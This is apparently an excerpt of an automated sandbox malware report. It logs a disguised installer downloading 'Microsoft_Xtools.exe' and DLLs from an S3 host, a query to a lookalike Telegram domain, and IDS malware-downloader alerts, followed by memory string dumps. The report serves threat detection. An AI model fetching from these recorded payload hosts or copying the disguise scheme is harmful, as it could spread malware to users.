Source: global traffic	HTTP traffic detected: GET /view.res HTTP/1.1Host: priapic.s3.ap-east-1.amazonaws.com
Source: global traffic	HTTP traffic detected: GET /MSVCP140.dll HTTP/1.1Host: priapic.s3.ap-east-1.amazonaws.com
Source: global traffic	HTTP traffic detected: GET /VCRUNTIME140.dll HTTP/1.1Host: priapic.s3.ap-east-1.amazonaws.com
Source: global traffic	HTTP traffic detected: GET /vcruntime140_1.dll HTTP/1.1Host: priapic.s3.ap-east-1.amazonaws.com

Source: Joe Sandbox View

ASN Name: COGENT-174US COGENT-174US

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49693 -> 3.5.237.40:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49695 -> 3.5.237.40:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49700 -> 3.5.237.40:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49701 -> 3.5.237.40:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49702 -> 3.5.237.40:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49703 -> 3.5.237.40:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 13_2_02203B10 recv,

13_2_02203B10

Source: global traffic	HTTP traffic detected: GET /Microsoft_Xtools.exe HTTP/1.1Host: priapic.s3.ap-east-1.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /UnityPlayer.dll HTTP/1.1Host: priapic.s3.ap-east-1.amazonaws.com
Source: global traffic	HTTP traffic detected: GET /static.ini HTTP/1.1Host: priapic.s3.ap-east-1.amazonaws.com
Source: global traffic	HTTP traffic detected: GET /view.res HTTP/1.1Host: priapic.s3.ap-east-1.amazonaws.com
Source: global traffic	HTTP traffic detected: GET /MSVCP140.dll HTTP/1.1Host: priapic.s3.ap-east-1.amazonaws.com
Source: global traffic	HTTP traffic detected: GET /VCRUNTIME140.dll HTTP/1.1Host: priapic.s3.ap-east-1.amazonaws.com
Source: global traffic	HTTP traffic detected: GET /vcruntime140_1.dll HTTP/1.1Host: priapic.s3.ap-east-1.amazonaws.com

Source: global traffic	DNS traffic detected: DNS query: priapic.s3.ap-east-1.amazonaws.com
Source: global traffic	DNS traffic detected: DNS query: telegram--www.com

Source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/purpose
Source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/purposefooKeyVersionTicket
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000024F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aia1.wosign.com/ca1g2-ts.cer0
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000024F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aia1.wosign.com/ca1g2.ts.cer0
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2313605934.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1740659417.000002A39B550000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1633472393.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1633286706.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: explorer.exe, 0000000C.00000000.1923761492.000000000934A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3142832306.000000000934A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1922009971.00000000071CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140769592.0000000007200000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076726004.00000000071FF000.00000004.00000001.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000013.00000003.2323150833.00000187C7FDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: Microsoft_Xtools.exe, 00000009.00000003.1740659417.000002A39B550000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1633472393.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1633286706.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2313605934.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1740659417.000002A39B550000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1633472393.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1633286706.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2313605934.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1740659417.000002A39B550000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1633472393.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1633286706.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000000.1281835761.0000000000012000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://certificates.intel.com/repository/CRL/Intel%20External%20Basic%20Issuing%20CA%203B(1).crl0
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000000.1281835761.0000000000012000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://certificates.intel.com/repository/CRL/Intel%20External%20Basic%20Policy%20CA.crl0
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000000.1281835761.0000000000012000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://certificates.intel.com/repository/certificates/Intel%20External%20Basic%20Issuing%20CA%203B(1
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000000.1281835761.0000000000012000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://certificates.intel.com/repository/certificates/Intel%20External%20Basic%20Policy%20CA.crt0
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000000.1281835761.0000000000012000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://crl.geotrust.com/crls/secureca.crl0
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2313605934.00000000033C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2313605934.00000000033C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2313605934.00000000033C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2313605934.00000000033C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000000.1281835761.0000000000012000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2313605934.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1740659417.000002A39B550000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1633472393.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1633286706.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: explorer.exe, 0000000C.00000000.1923761492.000000000934A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3142832306.000000000934A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1922009971.00000000071CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140769592.0000000007200000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076726004.00000000071FF000.00000004.00000001.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000013.00000003.2323150833.00000187C7FDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: Microsoft_Xtools.exe, 00000009.00000003.1740659417.000002A39B550000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1633472393.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1633286706.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2313605934.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1740659417.000002A39B550000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1633472393.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1633286706.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Microsoft_Xtools.exe, 00000009.00000003.1633286706.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Microsoft_Xtools.exe, 00000009.00000003.1740659417.000002A39B550000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1633472393.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1633286706.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000024F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crls1.wosign.com/ca1.crl0h
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000024F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crls1.wosign.com/ca1g2-ts.crl0m
Source: explorer.exe, 0000000C.00000002.3139180494.0000000004415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1921135374.0000000004415000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobeJH
Source: Microsoft_Xtools.exe, 00000009.00000003.1740659417.000002A39B550000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1633472393.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1633286706.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1923761492.000000000934A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3142832306.000000000934A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1922009971.00000000071CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140769592.0000000007200000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076726004.00000000071FF000.00000004.00000001.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000013.00000003.2323150833.00000187C7FDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2313605934.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1740659417.000002A39B550000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1633472393.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1633286706.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2313605934.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1740659417.000002A39B550000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1633472393.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1633286706.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2313605934.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1740659417.000002A39B550000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1633472393.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1633286706.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 0000000C.00000000.1923761492.000000000934A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3142832306.000000000934A000.00000004.00000001.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000013.00000003.2323150833.00000187C7FDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crl
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2313605934.00000000033C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2313605934.00000000033C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2313605934.00000000033C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2313605934.00000000033C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000000.1281835761.0000000000012000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000024F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp1.wosign.com/ca10/
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000024F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp1.wosign.com/ca1g2/ts0/
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000024F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000024F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: explorer.exe, 0000000C.00000000.1922752589.00000000077A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.3141313788.00000000077B0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.3141221489.0000000007700000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000023C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2313605934.00000000033C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2313605934.00000000033C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2313605934.00000000033C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000024F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000024F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000024F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000000.1281835761.0000000000012000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000000.1281835761.0000000000012000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000000.1281835761.0000000000012000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Microsoft_Xtools.exe, 00000009.00000003.1740659417.000002A39B550000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1633472393.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1633286706.000002A39B54C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000000.1281835761.0000000000012000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://www.intel.com/repository/CRL/Intel%20External%20Basic%20Issuing%20CA%203B(1).crl
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000000.1281835761.0000000000012000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://www.intel.com/repository/CRL/Intel%20External%20Basic%20Policy%20CA.crl
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000000.1281835761.0000000000012000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://www.intel.com/repository/certificates/Intel%20External%20Basic%20Issuing%20CA%203B(1).crt0u
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000000.1281835761.0000000000012000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://www.intel.com/repository/certificates/Intel%20External%20Basic%20Policy%20CA.crt0l
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000024F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000024F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe, 00000004.00000002.2312539451.00000000024F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.wosign.com/policy/0
Source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com
Source: explorer.exe, 0000000C.00000000.1927425047.000000000BE5D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 0000000C.00000003.3076011751.0000000009453000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3144400656.0000000009455000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppr
Source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.comhttps://assets.activity.windows.com/v1/assetshttps://assets.activity.win
Source: Microsoft_Xtools.exe, 00000009.00000003.1781943317.000002A39D4D8000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1775252350.000002A39D4DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/hcsadmin
Source: Microsoft_Xtools.exe, 00000009.00000003.1781943317.000002A39D4D8000.00000004.00000020.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000009.00000003.1775252350.000002A39D4DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/wsl2kernel
Source: explorer.exe, 0000000C.00000002.3147287649.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1927425047.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076302062.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3075659085.000000000BF37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3147824505.000000000BF44000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000000C.00000003.3075659085.000000000BF37000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3147824505.000000000BF44000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS%2
Source: explorer.exe, 0000000C.00000002.3147287649.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1927425047.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076302062.000000000BE14000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS9:
Source: explorer.exe, 0000000C.00000002.3147287649.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1927425047.000000000BE14000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3076302062.000000000BE14000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSd
Source: explorer.exe, 0000000C.00000002.3142832306.00000000092FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1923761492.00000000092FD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000000C.00000000.1923761492.000000000934A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3142832306.000000000934A000.00000004.00000001.00020000.00000000.sdmp, Microsoft_Xtools.exe, 00000013.00000003.2323150833.00000187C7FDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000C.00000000.1923761492.00000000091E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?3
Source: explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
Source: explorer.exe, 0000000C.00000000.1922009971.0000000007124000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3140182405.0000000007124000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000C.00000000.1923761492.00000000091E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3142832306.00000000091E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: Microsoft_Xtools.exe, 00000013.00000003.2304631549.00000187C7E34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.com
